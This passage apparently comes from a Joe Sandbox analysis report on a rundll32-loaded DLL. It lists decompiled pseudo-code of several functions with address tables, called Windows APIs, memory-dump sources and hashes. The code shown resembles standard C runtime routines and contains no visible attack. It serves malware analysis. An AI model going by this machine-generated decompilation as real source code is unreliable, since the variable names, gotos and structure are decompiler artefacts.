                                                      • Instruction Fuzzy Hash: A0416F71E04614AFDF219FD9CA849DEBBFCEB9E715B11047AE504AB260E7708A40CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7824EA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E7824EA(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E6E780FC4(_t33) != 0xffffffff) {
					_t13 =  *0x6e78cf98; // 0x28ef68
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E6E780FC4(2);
						if(E6E780FC4(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E6E780FC4(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E6E780F31(_t33);
						 *((char*)( *((intOrPtr*)(0x6e78cf98 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E6E77D565(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                                                      0x6e7824f1
                                                      0x6e7824fe
                                                      0x6e782504
                                                      0x6e78250c
                                                      0x6e78251a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e782522
                                                      0x6e782522
                                                      0x6e782524
                                                      0x6e782536
                                                      0x00000000
                                                      0x00000000
                                                      0x6e782538
                                                      0x6e782548
                                                      0x00000000
                                                      0x00000000
                                                      0x6e782550
                                                      0x6e782552
                                                      0x6e782553
                                                      0x6e78256b
                                                      0x6e782572
                                                      0x00000000
                                                      0x6e782580
                                                      0x00000000
                                                      0x6e78257b
                                                      0x6e78250c
                                                      0x6e782500
                                                      0x6e782500
                                                      0x00000000

                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000), ref: 6E782540
                                                      • GetLastError.KERNEL32(?,6E782418,?,6E78A948,0000000C,6E7824CA,?,?,?), ref: 6E78254A
                                                      • __dosmaperr.LIBCMT ref: 6E782575
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                      • String ID: h(
                                                      • API String ID: 2583163307-1268800477
                                                      • Opcode ID: 361f57fa9dfe0e408cdae41dd57db8dbc698025d56c8ab96a5bac980c7d05e06
                                                      • Instruction ID: f275a564f106deb059145fbfd5ada1acc4a7d6e171464f982489e959bb05c180
                                                      • Opcode Fuzzy Hash: 361f57fa9dfe0e408cdae41dd57db8dbc698025d56c8ab96a5bac980c7d05e06
                                                      • Instruction Fuzzy Hash: 6C01AB3368A1A02AD60046F4AA1C79F279C8FB373AF2506FBE814CB1E1FB70D8809550
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F9FB5, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: 04f5d099ec6d8a93170ef8695b0c674437c8c3655039957748ee84b2c90b7ccc
                                                      • Instruction ID: ca24569ef840a7a39690d784244d5b6e94b9150a88d3227a72c6ab319a2d6b0c
                                                      • Opcode Fuzzy Hash: 04f5d099ec6d8a93170ef8695b0c674437c8c3655039957748ee84b2c90b7ccc
                                                      • Instruction Fuzzy Hash: F8A15532A14346DFEB018F98CA90BAABBF4EF56350F14497DD4849B3A1D3359942CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77A0A9, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E6E77A0A9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				E6E7794D0(__ebx, __edi, __esi, 0x6e78a5b8, 0x10);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6E77B400(_t107, E6E779B2F(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6E77B400(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6e78ccc8; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6e785148();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6E77D1AE(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									E6E7794D0(_t75, _t101, _t107, 0x6e78a5d8, 8);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6E77A0A9(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6E77AE13(_t103, _t108[0x18], E6E779B2F( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6E77AE23(_t103, _t108[0x18], E6E779B2F( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6E779B2F();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                                      0x6e77a0b0
                                                      0x6e77a0b5
                                                      0x6e77a0b7
                                                      0x6e77a0ba
                                                      0x6e77a0bf
                                                      0x6e77a1cf
                                                      0x6e77a1cf
                                                      0x6e77a1cf
                                                      0x00000000
                                                      0x6e77a0ce
                                                      0x6e77a0ce
                                                      0x6e77a0d3
                                                      0x6e77a0dd
                                                      0x6e77a0df
                                                      0x6e77a0e4
                                                      0x6e77a0e9
                                                      0x6e77a0e9
                                                      0x6e77a0eb
                                                      0x6e77a0ee
                                                      0x6e77a0f3
                                                      0x6e77a115
                                                      0x6e77a115
                                                      0x6e77a118
                                                      0x6e77a11b
                                                      0x6e77a139
                                                      0x6e77a13c
                                                      0x6e77a17b
                                                      0x6e77a17e
                                                      0x6e77a181
                                                      0x6e77a1a6
                                                      0x6e77a1a8
                                                      0x00000000
                                                      0x6e77a1aa
                                                      0x6e77a1aa
                                                      0x6e77a1ac
                                                      0x00000000
                                                      0x6e77a1ae
                                                      0x6e77a1ae
                                                      0x6e77a1b3
                                                      0x6e77a1b7
                                                      0x6e77a1b7
                                                      0x6e77a1b8
                                                      0x00000000
                                                      0x6e77a1b8
                                                      0x6e77a1ac
                                                      0x6e77a183
                                                      0x6e77a183
                                                      0x6e77a185
                                                      0x00000000
                                                      0x6e77a187
                                                      0x6e77a187
                                                      0x6e77a189
                                                      0x00000000
                                                      0x6e77a18b
                                                      0x6e77a19c
                                                      0x00000000
                                                      0x6e77a1a1
                                                      0x6e77a189
                                                      0x6e77a185
                                                      0x6e77a13e
                                                      0x6e77a13e
                                                      0x6e77a142
                                                      0x00000000
                                                      0x6e77a148
                                                      0x6e77a148
                                                      0x6e77a14a
                                                      0x00000000
                                                      0x6e77a150
                                                      0x6e77a157
                                                      0x6e77a15f
                                                      0x6e77a163
                                                      0x6e77a165
                                                      0x6e77a168
                                                      0x6e77a16d
                                                      0x6e77a16e
                                                      0x00000000
                                                      0x6e77a16e
                                                      0x6e77a168
                                                      0x00000000
                                                      0x6e77a163
                                                      0x6e77a14a
                                                      0x6e77a142
                                                      0x6e77a11d
                                                      0x6e77a11d
                                                      0x00000000
                                                      0x6e77a11d
                                                      0x6e77a0fa
                                                      0x6e77a0fa
                                                      0x6e77a0ff
                                                      0x6e77a104
                                                      0x00000000
                                                      0x6e77a106
                                                      0x6e77a108
                                                      0x6e77a111
                                                      0x6e77a120
                                                      0x6e77a122
                                                      0x6e77a1e1
                                                      0x6e77a1e1
                                                      0x6e77a1e6
                                                      0x6e77a1ee
                                                      0x6e77a1f3
                                                      0x6e77a1f6
                                                      0x6e77a1f9
                                                      0x6e77a1fc
                                                      0x6e77a205
                                                      0x6e77a205
                                                      0x6e77a1fe
                                                      0x6e77a1fe
                                                      0x6e77a1fe
                                                      0x6e77a208
                                                      0x6e77a20c
                                                      0x6e77a20f
                                                      0x6e77a210
                                                      0x6e77a211
                                                      0x6e77a212
                                                      0x6e77a215
                                                      0x6e77a21e
                                                      0x6e77a21e
                                                      0x6e77a221
                                                      0x6e77a257
                                                      0x6e77a223
                                                      0x6e77a223
                                                      0x6e77a223
                                                      0x6e77a226
                                                      0x6e77a23d
                                                      0x6e77a23d
                                                      0x6e77a226
                                                      0x6e77a25c
                                                      0x6e77a266
                                                      0x6e77a272
                                                      0x6e77a130
                                                      0x6e77a130
                                                      0x6e77a135
                                                      0x6e77a136
                                                      0x6e77a170
                                                      0x6e77a177
                                                      0x6e77a1bb
                                                      0x6e77a1bb
                                                      0x6e77a1c2
                                                      0x6e77a1d1
                                                      0x6e77a1d4
                                                      0x6e77a1e0
                                                      0x6e77a1e0
                                                      0x6e77a122
                                                      0x6e77a104
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a0d3

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: 48bec2cb4bfcf07a7c9a34c69f41e6c2e80446661979671f36aa08fcfe5f1390
                                                      • Instruction ID: 990e67a6e047c1f35ae8f697da2cdfd364530e40475bcafb9bddfd6c4a7e6e42
                                                      • Opcode Fuzzy Hash: 48bec2cb4bfcf07a7c9a34c69f41e6c2e80446661979671f36aa08fcfe5f1390
                                                      • Instruction Fuzzy Hash: 3151DF72609706AFFF388F94DA54BAA77B8EF60315F114979E811472B0E731E980CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FBDAF, Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,B6B6B6B6,00000001,00000000,00000000,6E849A00,75FF0F74,6E7B15A7,00000000,00000001,00000001,B6B6B6B6,00000001,6E849A00,6E849A00), ref: 6E7FBDFC
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E7FBE85
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E7FBE97
                                                      • __freea.LIBCMT ref: 6E7FBEA0
                                                        • Part of subcall function 6E7F99F0: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 6E7F9A22
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 1b64a20f081568f26c42f03e018250cd43c1154120d69ac6dcde5803668e40af
                                                      • Instruction ID: 6f6f4834672a2f7dc01c455f704c799613820fd1f064ba61e375a98d2125bede
                                                      • Opcode Fuzzy Hash: 1b64a20f081568f26c42f03e018250cd43c1154120d69ac6dcde5803668e40af
                                                      • Instruction Fuzzy Hash: D331C032A0020BEBDF158FB4CDA4DEE7BAAEB41714F004128ED18D62A4E735E955CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77F343, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E77F343(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6E78053F(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6E78053F(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6E77D565(GetLastError());
									_t19 =  *((intOrPtr*)(E6E77D59B(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6E77F97F(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6E77D565(GetLastError());
						return  *((intOrPtr*)(E6E77D59B(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6E77F97F(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6E77F965(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}











                                                      0x6e77f34a
                                                      0x6e77f34f
                                                      0x6e77f36d
                                                      0x6e77f36f
                                                      0x6e77f372
                                                      0x6e77f39f
                                                      0x6e77f3a7
                                                      0x6e77f3a9
                                                      0x6e77f3c2
                                                      0x6e77f3c5
                                                      0x6e77f3c8
                                                      0x6e77f3d6
                                                      0x6e77f3e5
                                                      0x6e77f3ed
                                                      0x6e77f3ef
                                                      0x6e77f408
                                                      0x6e77f40b
                                                      0x6e77f40b
                                                      0x6e77f3f1
                                                      0x6e77f3f8
                                                      0x6e77f403
                                                      0x6e77f403
                                                      0x6e77f40d
                                                      0x00000000
                                                      0x6e77f40d
                                                      0x6e77f3cd
                                                      0x6e77f3d2
                                                      0x6e77f3d4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f3d4
                                                      0x6e77f3b2
                                                      0x00000000
                                                      0x6e77f3bd
                                                      0x6e77f374
                                                      0x6e77f377
                                                      0x6e77f37a
                                                      0x6e77f38d
                                                      0x6e77f390
                                                      0x6e77f363
                                                      0x6e77f363
                                                      0x00000000
                                                      0x6e77f366
                                                      0x6e77f380
                                                      0x6e77f385
                                                      0x6e77f387
                                                      0x6e77f411
                                                      0x6e77f411
                                                      0x00000000
                                                      0x6e77f387
                                                      0x6e77f351
                                                      0x6e77f356
                                                      0x6e77f35b
                                                      0x6e77f35d
                                                      0x6e77f360
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 6E77F965: _free.LIBCMT ref: 6E77F973
                                                        • Part of subcall function 6E78053F: WideCharToMultiByte.KERNEL32(?,00000000,6E77BC73,00000000,00000001,6E77BC02,6E77E8E0,?,6E77BC73,?,00000000,?,6E77E64F,0000FDE9,00000000,?), ref: 6E7805E1
                                                      • GetLastError.KERNEL32 ref: 6E77F3AB
                                                      • __dosmaperr.LIBCMT ref: 6E77F3B2
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E77F3F1
                                                      • __dosmaperr.LIBCMT ref: 6E77F3F8
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                      • String ID:
                                                      • API String ID: 167067550-0
                                                      • Opcode ID: 08923eea36771a19ddbd23a29d97a760223a5ee70ae9f8cf30a73dd2caea8366
                                                      • Instruction ID: 4a59a60adac7c27f2991429c658708edcbb59ea248ce17462c7d8a2e0144e9e0
                                                      • Opcode Fuzzy Hash: 08923eea36771a19ddbd23a29d97a760223a5ee70ae9f8cf30a73dd2caea8366
                                                      • Instruction Fuzzy Hash: 5C21C471604609BFDF349FE69B8485B77ADEF0636C7208925F92897160E730EC519FA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77EED8, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E6E77EED8(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6e78c108; // 0x5
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E77D934(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6E77D5E9(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6E77D934(__eflags,  *0x6e78c108, _t51);
							if(__eflags != 0) {
								E6E77ECDA(_t51, 0x6e78d308);
								E6E77D646(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6E77D934(__eflags,  *0x6e78c108, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6E77D934(0,  *0x6e78c108, 0);
							_push(0);
							L9:
							E6E77D646();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6E77D8F5(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6e78c108; // 0x5
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6E77D1AE(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6e78c108; // 0x5
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6E77D934(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6E77D5E9(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6E77D934(__eflags,  *0x6e78c108, _t60);
								if(__eflags != 0) {
									E6E77ECDA(_t60, 0x6e78d308);
									E6E77D646(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6E77D934(__eflags,  *0x6e78c108, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6E77D934(__eflags,  *0x6e78c108, _t20);
								_push(_t60);
								L25:
								E6E77D646();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6E77D8F5(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6e78c108; // 0x5
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6E77D1AE(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6e78c108; // 0x5
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6E77D934(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6E77D5E9(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6E77D934(__eflags,  *0x6e78c108, _t54);
											if(__eflags != 0) {
												E6E77ECDA(_t54, 0x6e78d308);
												E6E77D646(0);
												goto L45;
											} else {
												_t40 = 0;
												E6E77D934(__eflags,  *0x6e78c108, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6E77D934(0,  *0x6e78c108, 0);
											_push(0);
											L41:
											E6E77D646();
											goto L36;
										}
									}
								} else {
									_t54 = E6E77D8F5(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6e78c108; // 0x5
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}























                                                      0x6e77eed8
                                                      0x6e77eed8
                                                      0x6e77eee3
                                                      0x6e77eee5
                                                      0x6e77eeea
                                                      0x6e77eeed
                                                      0x6e77ef0b
                                                      0x6e77ef0e
                                                      0x6e77ef13
                                                      0x6e77ef15
                                                      0x00000000
                                                      0x6e77ef17
                                                      0x6e77ef23
                                                      0x6e77ef26
                                                      0x6e77ef27
                                                      0x6e77ef29
                                                      0x6e77ef4e
                                                      0x6e77ef50
                                                      0x6e77ef69
                                                      0x6e77ef70
                                                      0x6e77ef75
                                                      0x00000000
                                                      0x6e77ef52
                                                      0x6e77ef52
                                                      0x6e77ef5b
                                                      0x6e77ef60
                                                      0x00000000
                                                      0x6e77ef60
                                                      0x6e77ef2b
                                                      0x6e77ef2b
                                                      0x6e77ef2b
                                                      0x6e77ef34
                                                      0x6e77ef39
                                                      0x6e77ef3a
                                                      0x6e77ef3a
                                                      0x6e77ef3f
                                                      0x00000000
                                                      0x6e77ef3f
                                                      0x6e77ef29
                                                      0x6e77eeef
                                                      0x6e77eef5
                                                      0x6e77eef9
                                                      0x6e77ef06
                                                      0x00000000
                                                      0x6e77eefb
                                                      0x6e77eefe
                                                      0x6e77ef78
                                                      0x6e77ef78
                                                      0x6e77ef00
                                                      0x6e77ef00
                                                      0x6e77ef00
                                                      0x6e77ef02
                                                      0x6e77ef02
                                                      0x6e77ef02
                                                      0x6e77eefe
                                                      0x6e77eef9
                                                      0x6e77ef7b
                                                      0x6e77ef83
                                                      0x6e77ef85
                                                      0x6e77ef87
                                                      0x6e77ef8f
                                                      0x6e77ef94
                                                      0x6e77ef95
                                                      0x6e77ef9a
                                                      0x6e77ef9b
                                                      0x6e77ef9e
                                                      0x6e77efb8
                                                      0x6e77efbb
                                                      0x6e77efc0
                                                      0x6e77efc2
                                                      0x00000000
                                                      0x6e77efc4
                                                      0x6e77efd0
                                                      0x6e77efd3
                                                      0x6e77efd4
                                                      0x6e77efd6
                                                      0x6e77eff9
                                                      0x6e77effb
                                                      0x6e77f012
                                                      0x6e77f019
                                                      0x6e77f01e
                                                      0x00000000
                                                      0x6e77effd
                                                      0x6e77f004
                                                      0x6e77f009
                                                      0x00000000
                                                      0x6e77f009
                                                      0x6e77efd8
                                                      0x6e77efdf
                                                      0x6e77efe4
                                                      0x6e77efe5
                                                      0x6e77efe5
                                                      0x6e77efea
                                                      0x00000000
                                                      0x6e77efea
                                                      0x6e77efd6
                                                      0x6e77efa0
                                                      0x6e77efa6
                                                      0x6e77efa8
                                                      0x6e77efaa
                                                      0x6e77efb3
                                                      0x00000000
                                                      0x6e77efac
                                                      0x6e77efac
                                                      0x6e77efaf
                                                      0x6e77f029
                                                      0x6e77f029
                                                      0x6e77f02e
                                                      0x6e77f031
                                                      0x6e77f032
                                                      0x6e77f033
                                                      0x6e77f03a
                                                      0x6e77f03c
                                                      0x6e77f041
                                                      0x6e77f044
                                                      0x6e77f062
                                                      0x6e77f065
                                                      0x6e77f06a
                                                      0x6e77f06c
                                                      0x00000000
                                                      0x6e77f06e
                                                      0x6e77f07a
                                                      0x6e77f07e
                                                      0x6e77f080
                                                      0x6e77f0a5
                                                      0x6e77f0a7
                                                      0x6e77f0c0
                                                      0x6e77f0c7
                                                      0x00000000
                                                      0x6e77f0a9
                                                      0x6e77f0a9
                                                      0x6e77f0b2
                                                      0x6e77f0b7
